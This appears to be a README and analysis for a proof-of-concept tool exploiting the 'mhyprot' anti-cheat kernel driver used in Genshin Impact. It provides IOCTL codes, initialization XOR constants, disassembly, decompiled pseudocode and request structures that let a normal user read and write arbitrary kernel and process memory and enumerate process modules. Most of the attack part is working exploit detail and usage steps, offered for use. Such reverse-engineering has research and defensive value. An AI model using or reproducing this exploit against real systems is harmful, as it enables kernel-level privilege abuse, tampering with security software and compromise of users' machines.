
A PoC for vulnerable driver "mhyprot" that allows us to read/write memory in kernel/user from usermode.

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A PoC for vulnerable driver "mhyprot" that allows us to read/write memory in kernel/user from usermode.

Static Library is here: libmhyprot


  • 10/19/2020 implemented module eunmeration command and its doc



What we can do with this CLI is as follows:

  • Read/Write any kernel memory with privilege of kernel from usermode
  • Read/Write any user memory with privilege of kernel from usermode
  • Enumerate a number of modules by specific process id (New)
  • All operations are executed as kernel level privilege (ring-0) by the vulnerable driver


  • Administrator privilege only needed if the service is not yet running
  • Therefore we can execute commands above as the normal user (w/o administrator privilege)

The mhyprot is an anti-cheat kernel mode driver used in Genshin Impact.
The driver has vulnerable IOCTL commands that allows us to execute MmCopyVirtualMemory and memcpy(in the kernel!) from ring-3 (usermode).





  • Any version of Windows x64 that the driver works on
  • Administrator privilege does not required if the service already running

Tested on:

  • Windows10 x64 1903
  • Windows7 x64 6.1
  • Windows8.1 x64 6.3


bin.exe [TargetProcess] -options

following options are available as of now:

  • t
    • Perform Tests
  • d
    • Print debug infos
  • s
    • Print seedmap

Analysis and Proofs

The document(s) below is still in write so please forgive any mistakes I took in advance.

IOCTL Handler Functions

So what I did is that to reverse engineering around IOCTL handling functionalities.

Since around ioctl functions and its functionalities are packed, to reverse engineering is not easy than average.
but I can still easily find the function that registered at DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] since the IOCTL handler must have an IoCompleteRequest or like IofCompleteRequest that exported by ntoskrnl.
(Btw IoCompleteRequest is just a wrapper of IofCompleteRequest)


As mhyprot imports IofCompleteRequest then go xrefs, and we will see there are many ioctl handlers.
Concretely, I found two big subroutine in packed segment.

I've added it to this repo as binary since it's too big.

I will keep update if I found more another subroutine.

Driver Initialization

The MHYPROT_IOCTL_INITIALIZE what I defined in mhyprot.hpp#L18 can be found as follows:

PAGE:FFFFF800188CD8FD loc_FFFFF800188CD8FD:                   ; CODE XREF: sub_FFFFF800188CD6E0+213↑j
PAGE:FFFFF800188CD8FD                 cmp     ecx, 80034000h  ; MHYPROT_IOCTL_INITIALIZE
PAGE:FFFFF800188CD903                 jnz     short loc_FFFFF800188CD984
PAGE:FFFFF800188CD905                 cmp     r8d, 10h
PAGE:FFFFF800188CD909                 jnz     loc_FFFFF800188CDA4F
PAGE:FFFFF800188CD90F                 mov     rax, 0EBBAAEF4FFF89042h // <- _m_002
PAGE:FFFFF800188CD919                 xor     [rdi+8], rax
PAGE:FFFFF800188CD91D                 mov     rax, [rdi+8]
PAGE:FFFFF800188CD921                 xor     [rdi], rax
PAGE:FFFFF800188CD924                 cmp     dword ptr [rdi+4], 0BAEBAEECh // <- _m_001
PAGE:FFFFF800188CD92B                 jnz     loc_FFFFF800188CDA4F
PAGE:FFFFF800188CD931                 mov     ecx, [rdi]
PAGE:FFFFF800188CD933                 call    sub_FFFFF800188C51A8
PAGE:FFFFF800188CD938                 cmp     dword ptr cs:qword_FFFFF800188CA108, 0
PAGE:FFFFF800188CD93F                 jnz     short loc_FFFFF800188CD97D
PAGE:FFFFF800188CD941                 mov     rdx, [rdi+8]
PAGE:FFFFF800188CD945                 lea     rcx, xmmword_FFFFF800188CA0E8
PAGE:FFFFF800188CD94C                 call    sub_FFFFF800188C301C // <-
PAGE:FFFFF800188CD951                 mov     ebx, 7

and the sub_FFFFF800188C301C is look like:

.text:FFFFF800188C301C ; =============== S U B R O U T I N E =======================================
.text:FFFFF800188C301C sub_FFFFF800188C301C proc near          ; CODE XREF: sub_FFFFF800188CD6E0+26C↓p
.text:FFFFF800188C301C                                         ; DATA XREF: .upx0:FFFFF800189F2BA8↓o
.text:FFFFF800188C301C arg_0           = qword ptr  8
.text:FFFFF800188C301C                 test    rcx, rcx
.text:FFFFF800188C301F                 jz      locret_FFFFF800188C30B4
.text:FFFFF800188C3025                 mov     [rsp+arg_0], rbx
.text:FFFFF800188C302A                 push    rdi
.text:FFFFF800188C302B                 sub     rsp, 20h
.text:FFFFF800188C302F                 xor     eax, eax
.text:FFFFF800188C3031                 mov     rdi, rdx
.text:FFFFF800188C3034                 mov     [rcx], rax
.text:FFFFF800188C3037                 mov     rbx, rcx
.text:FFFFF800188C303A                 mov     [rcx+8], rax
.text:FFFFF800188C303E                 mov     edx, 9C0h       ; NumberOfBytes
.text:FFFFF800188C3043                 xor     ecx, ecx        ; PoolType
.text:FFFFF800188C3045                 call    cs:ExAllocatePool
.text:FFFFF800188C304B                 xor     edx, edx
.text:FFFFF800188C304D                 mov     r8d, 9C0h
.text:FFFFF800188C3053                 mov     rcx, rax
.text:FFFFF800188C3056                 mov     [rbx], rax
.text:FFFFF800188C3059                 call    sub_FFFFF800188C7900
.text:FFFFF800188C305E                 mov     rax, [rbx]
.text:FFFFF800188C3061                 mov     r9d, 1
.text:FFFFF800188C3067                 mov     [rbx+0Ch], r9d
.text:FFFFF800188C306B                 mov     [rax], rdi
.text:FFFFF800188C306E                 mov     [rbx+8], r9d
.text:FFFFF800188C3072 loc_FFFFF800188C3072:                   ; CODE XREF: sub_FFFFF800188C301C+8C↓j
.text:FFFFF800188C3072                 movsxd  r8, dword ptr [rbx+8]
.text:FFFFF800188C3076                 mov     rdx, [rbx]
.text:FFFFF800188C3079                 mov     rax, [rdx+r8*8-8]
.text:FFFFF800188C307E                 mov     rcx, rax
.text:FFFFF800188C3081                 shr     rcx, 3Eh
.text:FFFFF800188C3085                 xor     rcx, rax
.text:FFFFF800188C3088                 mov     rax, 5851F42D4C957F2Dh
.text:FFFFF800188C3092                 imul    rcx, rax
.text:FFFFF800188C3096                 add     rcx, r8
.text:FFFFF800188C3099                 mov     [rdx+r8*8], rcx
.text:FFFFF800188C309D                 add     [rbx+8], r9d
.text:FFFFF800188C30A1                 cmp     dword ptr [rbx+8], 138h
.text:FFFFF800188C30A8                 jl      short loc_FFFFF800188C3072
.text:FFFFF800188C30AA                 mov     rbx, [rsp+28h+arg_0]
.text:FFFFF800188C30AF                 add     rsp, 20h
.text:FFFFF800188C30B3                 pop     rdi
.text:FFFFF800188C30B4 locret_FFFFF800188C30B4:                ; CODE XREF: sub_FFFFF800188C301C+3↑j
.text:FFFFF800188C30B4                 retn
.text:FFFFF800188C30B4 sub_FFFFF800188C301C endp

A Way of Read/Write Specific Process Memory

The mhyprot calls MmCopyVirtualMemory eventually as wrapper defined as follows:

__int64 __fastcall sub_FFFFF800188C3EB8(struct _EPROCESS *a1, _DWORD *a2, __int64 a3)
  __int64 v3; // rbp
  _DWORD *v4; // rdi
  struct _EPROCESS *v5; // rbx
  PEPROCESS v6; // rsi
  char v8; // [rsp+28h] [rbp-20h]

  v3 = a3;
  v4 = a2;
  v5 = a1;
  if ( *a2 == 1 )
    v6 = IoGetCurrentProcess();
    v6 = a1;
    v5 = IoGetCurrentProcess();
  v8 = 0;
  return MmCopyVirtualMemory(v6, *((_QWORD *)v4 + 3), v5, *((_QWORD *)v4 + 2), (unsigned int)v4[8], v8, v3);

Called by:

__int64 __fastcall sub_FFFFF800188C3F2C(_DWORD *a1_rw_request, __int64 a2_returnsize, __int64 a3)
  __int64 v3_returnsize; // rsi
  _DWORD *v4_rw_request; // rbx
  __int64 v5_processid; // rcx
  bool v6_ntstatus_lookup_success_bool; // di
  unsigned int v8_ntstatus; // ebx
  PVOID Object; // [rsp+40h] [rbp+8h]

  v3_returnsize = a2_returnsize;
  v4_rw_request = a1_rw_request;
  v5_processid = (unsigned int)a1_rw_request[2];
  Object = 0i64;
  v6_ntstatus_lookup_success_bool = (int)PsLookupProcessByProcessId(v5_processid, &Object, a3) >= 0;// NT_SUCCESS
  if ( !Object )
    return 3221225473i64;
  v8_ntstatus = sub_FFFFF800188C3EB8((struct _EPROCESS *)Object, v4_rw_request, v3_returnsize);
  if ( v6_ntstatus_lookup_success_bool )
  return v8_ntstatus;

Called by:

bool __fastcall sub_FFFFF800188C4214(_DWORD *a1_rw_request, _DWORD *a2_returnsize, __int64 a3)
  _DWORD *v3_returnsize; // rbx
  int v5_ntstatus; // [rsp+20h] [rbp-18h]
  __int64 v6_returnsize; // [rsp+50h] [rbp+18h]

  v3_returnsize = a2_returnsize;
  v6_returnsize = 0i64;
  v5_ntstatus = sub_FFFFF800188C3F2C(a1_rw_request, (__int64)&v6_returnsize, a3);
  *v3_returnsize = v6_returnsize;
  return v5_ntstatus == 0;                      // NT_SUCCESS(v5_ntstatus)

Finally we are at the root of the tree:

PAGE:FFFFF800188CD303 loc_FFFFF800188CD303:                   ; CODE XREF: sub_FFFFF800188CD000+2C7↑j
PAGE:FFFFF800188CD303                 and     dword ptr [rbp+1D0h+arg_20], 0
PAGE:FFFFF800188CD30A                 lea     rdx, [rbp+1D0h+arg_20]
PAGE:FFFFF800188CD311                 mov     rcx, [rsp+30h]
PAGE:FFFFF800188CD316                 call    sub_FFFFF800188C4214 // <- Here
PAGE:FFFFF800188CD31B                 jmp     loc_FFFFF800188CD21C

Call map:



I have confirmed that by simply hooking mhyprot kernel module:


A Way of Read Kernel Memory

We can see so many IOCTL commands and the MHYPROT_IOCTL_READ_KERNEL_MEMORY what I defined in mhyprot.hpp#L19 can be found as follows:

PAGE:FFFFF800188CD7A9 loc_FFFFF800188CD7A9:                   ; CODE XREF: sub_FFFFF800188CD6E0+BA↑j
PAGE:FFFFF800188CD7A9                 cmp     ecx, 83064000h  ; MHYPROT_IOCTL_READ_KERNEL_MEMORY
PAGE:FFFFF800188CD7AF                 jnz     short loc_FFFFF800188CD7C8
PAGE:FFFFF800188CD7B1                 mov     rdx, [rdi]
PAGE:FFFFF800188CD7B4                 lea     rcx, [rdi+4]
PAGE:FFFFF800188CD7B8                 mov     r8d, [rdi+8]
PAGE:FFFFF800188CD7BC                 call    sub_FFFFF800188C63A8 // <-

And the sub_FFFFF800188C63A8 is like:

.text:FFFFF800188C63A8 sub_FFFFF800188C63A8 proc near          ; CODE XREF: sub_FFFFF800188CD6E0+DC↓p
.text:FFFFF800188C63A8                                         ; DATA XREF: .upx0:FFFFF800189F2EE4↓o
.text:FFFFF800188C63A8 arg_0           = qword ptr  8
.text:FFFFF800188C63A8 arg_8           = qword ptr  10h
.text:FFFFF800188C63A8                 mov     [rsp+arg_0], rbx
.text:FFFFF800188C63AD                 mov     [rsp+arg_8], rsi
.text:FFFFF800188C63B2                 push    rdi
.text:FFFFF800188C63B3                 sub     rsp, 20h
.text:FFFFF800188C63B7                 mov     edi, r8d
.text:FFFFF800188C63BA                 mov     rbx, rdx
.text:FFFFF800188C63BD                 mov     rsi, rcx
.text:FFFFF800188C63C0                 test    rdx, rdx
.text:FFFFF800188C63C3                 jz      short loc_FFFFF800188C63F2
.text:FFFFF800188C63C5                 test    r8d, r8d
.text:FFFFF800188C63C8                 jz      short loc_FFFFF800188C63F2
.text:FFFFF800188C63CA                 mov     rax, cs:MmHighestUserAddress
.text:FFFFF800188C63D1                 cmp     rdx, [rax]
.text:FFFFF800188C63D4                 jb      short loc_FFFFF800188C63F2
.text:FFFFF800188C63D6                 mov     r8d, edi
.text:FFFFF800188C63D9                 xor     edx, edx
.text:FFFFF800188C63DB                 call    sub_FFFFF800188C7900
.text:FFFFF800188C63E0                 mov     r8d, edi
.text:FFFFF800188C63E3                 mov     rdx, rsi
.text:FFFFF800188C63E6                 mov     rcx, rbx
.text:FFFFF800188C63E9                 call    sub_FFFFF800188C3DD8
.text:FFFFF800188C63EE                 xor     eax, eax
.text:FFFFF800188C63F0                 jmp     short loc_FFFFF800188C63F5

Here is the ioctl handlers, found the 0x83064000(MHYPROT_IOCTL_READ_KERNEL_MEMORY) as cmp ecx, 83064000h and some another ioctl codes as follows:


Call map:

As I defined as DWORD result in mhyprot.hpp#L40 the first 4bytes is result.
I can guess it's a NTSTATUS as it typedef'ed as typedef LONG NTSTATUS natively and the dispathers return types are NTSTATUS and the result will directly be got stored from it.


Enumerate Modules

So the driver has a lots of commands that make us advantage.
In this case, we are able to enumerate modules that loaded in the target process by process id and a number which specifies we want to get.

I'll explain herewith below how I made it managed to work it with reverse engineering.
The implementation can be found at mhyprot.cpp#L343.

First of all, As you can see there is cmp ecx, 82054000h as I defined in mhyprot.hpp#L22 as MHYPROT_IOCTL_ENUM_PROCESS_MODULES.


And it calls:

__int64 __fastcall sub_FFFFF800188C26D0(unsigned int a1, __int64 a2, __int64 a3)
  __int64 v3; // rsi
  unsigned int v4; // ebx
  bool v5; // di
  unsigned int v7; // ebx
  PVOID Object; // [rsp+58h] [rbp+20h]

  v3 = a2;
  Object = 0i64;
  v4 = a3;
  v5 = (int)PsLookupProcessByProcessId(a1, &Object, a3) >= 0;
  if ( !Object )
    return 0i64;
  v7 = sub_FFFFF800188C27D4(Object, v3, v4);
  if ( Object )
    if ( v5 )
  return v7;

As you cansee, the function checks is process 32-bit or 64-bit by PsGetProcessWow64Process() since PEB is different between 32 and 64-bit processes.
In this case, I only talk about for 64-bit process.

After that, the function attaches from kernel using KeStackAttachProcess. the second parameter is PKAPC_STATE.
Then, call PsGetProcessPeb and get the PEB belongs to the target process.

...LDR_MODULE is undocumented structure.

typedef struct _LDR_MODULE {
  LIST_ENTRY              // InLoadOrderModuleList;
  LIST_ENTRY              // InMemoryOrderModuleList;
  LIST_ENTRY              // InInitializationOrderModuleList;
  PVOID                   // BaseAddress;
  PVOID                   // EntryPoint;
  ULONG                   // SizeOfImage;
  UNICODE_STRING          // FullDllName;
  UNICODE_STRING          // BaseDllName;
  ULONG                   // Flags;
  SHORT                   // LoadCount;
  SHORT                   // TlsIndex;
  LIST_ENTRY              // HashTableEntry;
  ULONG                   // TimeDateStamp;

And the function pseudocode for sub_FFFFF800188C27D4 is like:

__int64 __fastcall sub_FFFFF800188C27D4(
  __int64 a1,       // pEPROCESS
  __int64 a2,       // pointer to the buffer that sent from usermode
  unsigned int a3   // max count to get
  if ( !a1 )
    return 0i64;
  v9 = ((__int64 (*)(void))PsGetProcessWow64Process)() != 0;
  KeStackAttachProcess(v5, &v30);
  if ( !v9 ) // the process is 64-bit
    v17 = PsGetProcessPeb(v5); // Lookup PEB
    v18 = v17;
    if ( v17 )
      v19 = *(_QWORD *)(v17 + 24); // PEB->Ldr
      if ( v19 )
        for ( j = *(__int64 **)(v19 + 16);
              j != (__int64 *)(*(_QWORD *)(v18 + 24) + 16i64); // PEB->Ldr->InMemoryOrderModuleList.Flink
              j = (__int64 *)*j )
          if ( v7 < v3 ) // if the counter less than a number what we want to get
            v21 = 928i64 * v7; // [IMPORTANT] we can see output structure is 0x3A0 alignment
            sub_FFFFF800188C7900(v21 + v4 + 12, 0i64, 256i64); // fill memory by 0 sizeof 0x100
            sub_FFFFF800188C7900(v21 + v4 + 268, 0i64, 520i64); // fill memory by 0 sizeof 0x208
            *(_QWORD *)(v21 + v4) = j[6];
            *(_DWORD *)(v21 + v4 + 8) = *((_DWORD *)j + 16);
            v22 = *((_WORD *)j + 44);
            v23 = 127i64;
            if ( v22 <= 0x7Fu )
              v23 = v22;
            sub_FFFFF800188C75C0(v21 + v4 + 12, j[12], v23); // copy BaseDllName to the buffer
            v24 = *((_WORD *)j + 36);
            v25 = v24;
            if ( v24 > 0x103u )
              v25 = 259i64;
            sub_FFFFF800188C75C0(v21 + v4 + 268, j[10], v25); // copy FullDllName to the buffer
            *(_QWORD *)(v21 + v4 + 792) = *((unsigned int *)j + 32);
            v3 = v32;
          ++v6; // counter
          ++v7; // counter
  } else { ... /* 32-bit PEB (Redacted) */ }
  KeUnstackDetachProcess(&v30); // detach
  return v6;

We got a much information from it as follows:

  • We can get BaseDllName and FullDllName using this ioctl command
  • What we need is only ProcessId and MaxCount
  • The output buffer will overrided in the request buffer
  • The output buffer also must have 0x3A0 size alignment per module

Now lets time to code, as we define structure for the payload:

(This is defined in mhyprot.hpp#L62 as well.)

	uint32_t process_id;
	uint32_t max_count;


if (uVar1_ControlCode == 0x82054000) {
	uVar6 = GetModuleListByProcessId_FUN_000126d0
		(*(uint *)puVar3_RequestContext, 				// process id
		(longlong)(uint *)((longlong)puVar3_RequestContext + 4), 	// out buffer, the output will be stored with overriding max count...
		*(uint *)((longlong)puVar3_RequestContext + 4) 			// max count
	iVar3 = (int)uVar6;
// mhyprot overrides first 4byte of the payload buffer to identify success or fail
*(int *)puVar3_RequestContext = iVar3;

What we need is:

    1. Allocate memory for payload and its result, 0x3A0 * MaxCount
    1. Send the payload with the ioctl code 0x82054000
    1. Check for the first 4byte

Call map:



I've hooked some part of mhyprot kernel module, especially PsGetProcessPEB and PsLookupProcessByProcessId and confirmed.